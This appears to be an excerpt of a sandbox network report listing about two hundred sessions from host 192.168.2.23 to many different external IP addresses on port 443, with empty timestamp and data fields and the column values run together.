                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13293192.168.2.234893686.62.9.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13294192.168.2.2356196103.87.141.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13295192.168.2.2350710129.227.69.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13296192.168.2.235514847.205.121.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13297192.168.2.2355184124.246.225.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13298192.168.2.2360614112.252.191.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13299192.168.2.2335178169.249.94.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13300192.168.2.23512044.231.54.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13301192.168.2.235399665.69.64.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13302192.168.2.2360628219.98.241.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13303192.168.2.2348144138.51.48.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13304192.168.2.2337820176.88.87.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13305192.168.2.2355068178.53.150.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13306192.168.2.2339572120.7.220.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13307192.168.2.234226095.241.105.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13308192.168.2.2355998110.127.237.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13309192.168.2.2338162154.207.196.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13310192.168.2.2339982177.27.115.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13311192.168.2.2345684209.87.228.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13312192.168.2.2351576118.124.23.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13313192.168.2.235877669.130.241.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13314192.168.2.2353812135.64.142.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13315192.168.2.2346046149.27.94.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13316192.168.2.2344576188.228.35.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13317192.168.2.233892096.15.146.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13318192.168.2.2342910181.246.75.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13319192.168.2.2357516165.1.58.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13320192.168.2.233619063.210.213.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13321192.168.2.2348938180.96.59.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13322192.168.2.2358808148.90.135.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13323192.168.2.2351262110.26.226.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13324192.168.2.234704883.235.43.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13325192.168.2.2336764163.145.104.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13326192.168.2.2344160124.89.87.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13327192.168.2.233894063.110.173.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13328192.168.2.2335466106.224.170.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13329192.168.2.2347274219.131.60.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13330192.168.2.2357550123.32.90.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13331192.168.2.23564064.103.20.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13332192.168.2.235079854.244.18.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13333192.168.2.234410261.118.145.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13334192.168.2.234885446.63.111.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13335192.168.2.2341420201.136.66.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13336192.168.2.235623034.125.254.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13337192.168.2.234493662.97.3.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13338192.168.2.2360710177.113.148.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13339192.168.2.2333270180.46.235.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13340192.168.2.2349062157.203.151.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13341192.168.2.2346990141.82.250.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13342192.168.2.235115877.197.254.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13343192.168.2.2346744138.41.155.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13344192.168.2.2338208136.61.52.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13345192.168.2.2345014220.19.33.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13346192.168.2.234552818.201.245.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13347192.168.2.2345104131.114.26.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13348192.168.2.2350968101.202.156.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13349192.168.2.2338538217.247.59.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13350192.168.2.2350446223.78.98.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13351192.168.2.2338292197.42.185.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13352192.168.2.2345998223.9.212.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13353192.168.2.234691276.109.233.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13354192.168.2.234213295.38.203.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13355192.168.2.2335610113.18.91.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13356192.168.2.235568012.49.102.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13357192.168.2.235030445.248.207.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13358192.168.2.235803614.226.218.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13359192.168.2.2352818151.38.103.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13360192.168.2.2336684105.77.118.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13361192.168.2.2335104212.197.70.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13362192.168.2.2340594157.128.65.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13363192.168.2.233333824.82.53.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13364192.168.2.235034666.26.86.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13365192.168.2.234377870.185.172.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13366192.168.2.234927481.140.27.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13367192.168.2.2339538141.110.116.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13368192.168.2.234381227.55.115.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13369192.168.2.2333376102.174.80.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13370192.168.2.235435446.209.159.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13371192.168.2.235935699.236.131.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13372192.168.2.235538663.3.49.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13373192.168.2.235912639.169.236.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13374192.168.2.2339978164.121.32.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13375192.168.2.234580446.18.135.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13376192.168.2.2343976139.238.143.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13377192.168.2.233893681.184.122.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13378192.168.2.2359280189.161.226.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13379192.168.2.2335246191.218.64.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13380192.168.2.2335144140.92.93.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13381192.168.2.2354230123.89.104.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13382192.168.2.2342076162.109.128.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13383192.168.2.2333038114.83.238.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13384192.168.2.2339506188.1.41.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13385192.168.2.2358182177.237.230.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13386192.168.2.234620840.201.32.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13387192.168.2.2340036168.50.158.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13388192.168.2.2339066182.49.189.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13389192.168.2.2358846180.57.23.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13390192.168.2.2352828109.205.160.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13391192.168.2.2354192207.45.86.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13392192.168.2.234325012.40.164.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13393192.168.2.2342436160.124.200.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13394192.168.2.235602237.232.93.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13395192.168.2.234008089.242.202.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13396192.168.2.235633262.214.251.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13397192.168.2.2351610200.207.103.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13398192.168.2.2349582152.65.220.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13399192.168.2.2347880172.114.18.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13400192.168.2.2343602207.181.155.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13401192.168.2.2349304146.133.92.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13402192.168.2.2339290149.184.80.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13403192.168.2.2344620158.31.78.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13404192.168.2.2360028197.81.16.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13405192.168.2.233728041.188.0.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13406192.168.2.2340298197.171.176.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13407192.168.2.2352930160.42.148.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13408192.168.2.2357768196.4.236.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13409192.168.2.2352546132.77.57.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13410192.168.2.2351836137.54.163.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13411192.168.2.2350180147.20.214.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13412192.168.2.2359378124.89.131.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13413192.168.2.2337948154.230.76.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13414192.168.2.235936440.38.0.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13415192.168.2.2338108192.179.38.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13416192.168.2.234718843.92.206.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13417192.168.2.2358804209.184.134.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13418192.168.2.2353502146.223.54.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13419192.168.2.234549252.128.17.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13420192.168.2.233686842.236.146.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13421192.168.2.2354420158.200.23.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13422192.168.2.2337370192.177.123.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13423192.168.2.2339030196.118.41.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13424192.168.2.236037650.108.179.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13425192.168.2.2338764140.95.125.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13426192.168.2.2355456223.243.42.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13427192.168.2.233350250.38.179.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13428192.168.2.235929625.180.18.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13429192.168.2.2357980133.48.142.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13430192.168.2.2347070112.75.67.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13431192.168.2.2346270169.84.34.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13432192.168.2.236073024.228.134.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13433192.168.2.2344570185.101.190.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13434192.168.2.2355480207.184.7.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13435192.168.2.2347754157.190.175.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13436192.168.2.2359880112.129.166.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13437192.168.2.2344532210.135.172.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13438192.168.2.2340650178.89.117.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13439192.168.2.233746464.255.59.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13440192.168.2.2355842211.113.174.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13441192.168.2.2336386179.227.156.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13442192.168.2.23552761.240.155.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13443192.168.2.2354514146.237.246.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13444192.168.2.2334856206.129.182.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13445192.168.2.2354096178.5.57.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13446192.168.2.2348378205.77.255.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13447192.168.2.233975620.149.68.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13448192.168.2.234898266.120.245.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13449192.168.2.2350276125.169.93.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13450192.168.2.234902827.131.60.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13451192.168.2.2341208169.156.124.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13452192.168.2.2344298222.15.97.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13453192.168.2.2334174141.125.190.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13454192.168.2.2346542175.140.5.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13455192.168.2.2340186205.81.150.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13456192.168.2.2335882203.83.189.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13457192.168.2.2339414130.178.111.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13458192.168.2.2360142185.151.202.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13459192.168.2.2341296217.163.134.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13460192.168.2.23543528.92.227.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13461192.168.2.2343670137.158.216.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13462192.168.2.2352828186.51.106.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13463192.168.2.2354308110.101.139.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13464192.168.2.235250691.129.121.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13465192.168.2.235536486.22.79.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13466192.168.2.2347902137.101.79.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13467192.168.2.2344320150.154.128.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13468192.168.2.2343992116.232.227.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13469192.168.2.2333192194.56.145.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13470192.168.2.2354466144.60.115.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13471192.168.2.2334470177.253.77.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13472192.168.2.234126085.177.16.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13473192.168.2.2333190115.220.162.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13474192.168.2.233988261.25.87.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13475192.168.2.2355738167.230.12.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13476192.168.2.2335226179.128.127.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13477192.168.2.2343672200.36.10.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13478192.168.2.2336388105.60.27.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13479192.168.2.2345888115.101.71.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13480192.168.2.2349902105.43.121.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13481192.168.2.2345976103.71.54.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13482192.168.2.2351896102.168.161.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13483192.168.2.2359368187.108.226.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13484192.168.2.23346785.83.192.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13485192.168.2.234795692.245.107.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13486192.168.2.235345479.3.239.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13487192.168.2.234817664.175.10.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13488192.168.2.2347534195.103.184.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13489192.168.2.234058499.74.236.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13490192.168.2.233459663.207.187.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13491192.168.2.235829862.55.54.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13492192.168.2.23503301.216.24.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13493192.168.2.234010496.169.62.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13494192.168.2.2360814115.236.128.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13495192.168.2.2358634131.237.162.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13496192.168.2.234018818.99.112.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13497192.168.2.2356494173.235.160.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13498192.168.2.2336068138.56.231.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13499192.168.2.235216096.144.255.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13500192.168.2.2341730190.175.106.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13501192.168.2.2337332153.62.69.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13502192.168.2.2348260146.21.169.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13503192.168.2.2359156118.255.55.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13504192.168.2.235108687.30.255.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13505192.168.2.235621613.27.85.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13506192.168.2.235456219.92.229.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13507192.168.2.2360540212.103.118.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13508192.168.2.234807640.153.197.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13509192.168.2.234929658.229.108.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13510192.168.2.234522883.37.231.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13511192.168.2.2343214166.51.46.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13512192.168.2.234007871.131.105.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13513192.168.2.2334434196.172.238.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13514192.168.2.234129227.254.197.37443
